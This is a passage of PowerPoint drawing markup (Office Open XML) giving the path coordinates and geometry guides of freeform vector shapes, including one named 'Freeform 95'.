                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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3091" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1037" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1318" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1276" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1275" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="87"/>
